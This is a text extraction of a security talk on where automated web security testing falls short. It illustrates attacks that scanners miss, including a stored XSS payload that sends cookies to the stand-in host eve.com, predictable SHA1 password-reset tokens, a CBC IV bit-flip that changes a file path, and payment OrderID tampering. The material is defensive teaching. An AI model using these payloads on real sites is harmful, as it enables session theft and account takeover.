security testing where automation fails today
play

Security Testing - Where Automation Fails Today How does security - PowerPoint PPT Presentation

Security Testing - Where Automation Fails Today How does security testing of web applications work What does the tooling landscape look like How does automated security testing fail What can we do Image courtesy of


  1. Security Testing - Where Automation Fails

  2. Today • How does security testing of web applications work • What does the tooling landscape look like • How does automated security testing fail • What can we do Image courtesy of http://theverybesttop10.com/funny-bad-security-fails/

  3. Hi Christiaan Ottow • Developer, Sysop, Hacker • Security Coach @ Computest / Pine Digital Security • cottow@computest.nl • @cottow Image courtesy of https://ospois.wordpress.com/2008/11/13/

  4. Image courtesy of http://matrix.wikia.com/wiki/The_Matrix_Revolutions Image courtesy of http://knowyourmeme.com/memes/ fi rst-day-on-the-internet-kid

  5. Image courtesy of http://www.opensamm.org/

  6. Image courtesy of https://www.microsoft.com/en-us/sdl/process/veri fi cation.aspx

  7. Web application Web application API Ext. Connector Middleware Middleware Mgt system DB SAN

  8. Web application Web application API Ext. Connector Middleware Middleware Mgt system DB SAN

  9. Web application Web application API Ext. Connector Middleware Middleware Mgt system DB SAN

  10. See https://www.certi fi edsecure.com/checklists/

  11. Message to John ATTACKER Hi John, <script>var i = new Image(); img.src = ‘http:// eve.com/'+document.cook FriendFace website ie; </script> how are you? Message from Kevin <html> <body> VICTIM <p>Message from Eve:</p> <p>Hi John, <script>var i = new Image(); img.src = ‘http:// eve.com/'+document.cookie;</script> how are you? </p> </body> </html>

  12. Image courtesy of Acunetix

  13. <?php $name = $_GET[‘name’]; echo “Welcome, $name!” http://test.site/welcome.php?name=<script>

  14. <?php $name = $_GET[‘name’]; echo “Welcome, $name!” http://test.site/welcome.php?name=<script> Welcome, <script>!

  15. <?php $name = htmlspecialchars($_GET[‘name’]); echo “Welcome, $name!” http://test.site/welcome.php?name=<script>

  16. <?php $name = htmlspecialchars($_GET[‘name’]); echo “Welcome, $name!” http://test.site/welcome.php?name=<script> Welcome, &lt;script&gt;!

  17. Image courtesy of http://theverybesttop10.com/funny-bad-security-fails/

  18. Penetration testing cannot prove or even demonstrate that a system is flawless. It can place a reasonable bound on the knowledge and work factor required for a penetrator to succeed. - Smart Guy on the Internet [..] penetration testing cannot prove security of the system, just as no doctor can prove that you are without occult disease; thus, it can just prove that the system is vulnerable. - Other Smart Guy on the Internet

  19. Image courtesy of https://www.microsoft.com/en-us/sdl/process/veri fi cation.aspx

  20. Vulnerability SAST scanner DAST scanner scanner HTTP HTTP, TCP/IP Orchestration <?php include(“header. php”); echo “Hello, world!”; <?php include(“header.php”); Acceptance Production <?php <?php Repository include(“header. include(“header. echo “Hello, world!”; php”); php”); infra infra echo “Hello, echo “Hello, world!”; world!”;

  21. SAST DAST • HP Fortify • Nessus • Checkmarx • Burp Suite • Veracode • Acunetix • Coverity • Qualys WAS • IBM AppScan Source • Netsparker • IBM AppScan

  22. + • Injection testing • SQL, XSS, LDAP, XML, LFI, … • Session handling • CSRF, session regeneration and invalidation, cookie settings, .. • Hardening • Use of SSL and certi fi cate settings, best practices for HTTP headers, extraneous content, … • Infrastructure testing • Open ports, old versions, weak auth methods, known vulns, …

  23. - • Business rules bypass • Unintended state transitions, … • Authorization checking • Predictable tokens / IDs, ID-based authorization, … • Incorrect use of crypto and RNGs • Sign but don’t verify, weak random numbers, AES ECB mode, CBC with public IV, … • System interoperation

  24. € 5,005 ?

  25. https://jira.company.nl/reset/a9bfea171aaf723728939ccd6c67f0e8e59f11de

  26. https://jira.company.nl/reset/a9bfea171aaf723728939ccd6c67f0e8e59f11de sha1(“cottow@company.nl”) = a9bfea171aaf723728939ccd6c67f0e8e59f11de

  27. sha1(“ceo@company.nl”) = 9f26486b094bcc6c1838b42da2eb48f6635f2f84

  28. sha1(“ceo@company.nl”) = 9f26486b094bcc6c1838b42da2eb48f6635f2f84 https://jira.company.nl/reset/9f26486b094bcc6c1838b42da2eb48f6635f2f84

  29. <?php // get params $fname = $_GET['filename']; $iv = $_GET['iv']; // setup crypto $ch = mcrypt_module_open(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_CBC, ''); mcrypt_generic_init($ch, $key, $iv); // open file $fp = fopen(mcrypt_generic($ch, $fname), 'r'); fpassthru($fp);

  30. 10100101 ^ 11101010 = 01001111

  31. decrypted = “/home/john/secret.txt" iv = "\x00\x00\x00\x00\x00\x00\x07\x0e\x1a \x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00" decrypted ^ iv = "/home/mark/secret.txt"

  32. <script>alert(document.cookie);</script>

  33. Blog comment ATTACKER Nice blog! <script>var i = new Image(); img.src = ‘http:// eve.com/'+document.cook ie; Wordpress frontend </script> Database Nice blog! <script>var i = new Image(); img.src = ‘http:// eve.com/'+doc ument.cookie; </script> List of comments <html> Nice blog! <script>var i = new <body> Image(); VICTIM img.src = ‘http:// <p>Comments:</p> eve.com/'+doc ument.cookie; </script> <p>Hi John, <script>var i = new Image(); img.src = ‘http:// eve.com/'+document.cookie;</script> Wordpress admin site how are you? </p> </body> </html>

  34. Order for € 151,63 www.shop.nl/checkout?orderID=1337 ideal.payment.nl/?m=43278&o=1337&a=15163&OrderID=1337&Lang=NL www.shop.nl/con fi rmed?o=1337&status=ok& sig=0d07b9e87debaec6d8d3c71767122fc2&OrderID=1337&Lang=NL

  35. Order for € 151,63 www.shop.nl/checkout?orderID=1337 ideal.payment.nl/?m=43278&o=1337&a=15163&OrderID=1337&Lang=NL www.shop.nl/con fi rmed?o=1337&status=ok& sig=0d07b9e87debaec6d8d3c71767122fc2&OrderID=1337&Lang=NL

  36. Order for € 151,63 www.shop.nl/checkout?orderID=1337 ideal.payment.nl/?m=43278&o=1337&a=15163&OrderID=1337&Lang=NL www.shop.nl/con fi rmed?o=1337&status=ok& sig=0d07b9e87debaec6d8d3c71767122fc2&OrderID=1337&Lang=NL

  37. Order for € 151,63 www.shop.nl/checkout?orderID=1337 ideal.payment.nl/?m=43278&o=1337&a=15163&OrderID=1337&Lang=NL www.shop.nl/con fi rmed?o=1337&status=ok& sig=0d07b9e87debaec6d8d3c71767122fc2&OrderID=1337&Lang=NL

  38. Order for € 151,63 www.shop.nl/checkout?orderID=1337 ideal.payment.nl/?m=43278&o=1337&a=15163&OrderID=1337&Lang=NL www.shop.nl/con fi rmed?o=1337&status=ok& sig=0d07b9e87debaec6d8d3c71767122fc2&OrderID=1336&Lang=NL

  39. Image courtesy of http://9gag.com/gag/3699936/son-i-am-derp

  40. Vulnerability SAST scanner DAST scanner scanner HTTP HTTP, TCP/IP Orchestration <?php include(“header. php”); echo “Hello, world!”; <?php include(“header.php”); Acceptance Production <?php <?php Repository include(“header. include(“header. echo “Hello, world!”; php”); php”); infra infra echo “Hello, echo “Hello, world!”; world!”;

  41. Image courtesy of http://www.qahipster.com/blog/what-is-unit-testing-part-1-of-2

  42. Summary • Security testing is a distinct expertise • Tools can only do part of the testing • Make sure you have the right expertise in your team or enlist help • Make use of the overlap between security- and functional testing Image courtesy of https://memegenerator.net/That-Would-Be-Great

  43. Image courtesy of http://www.slideshare.net/linaroorg/sfo15tr6-server-ecosystem-day-part-6a

Recommend


More recommend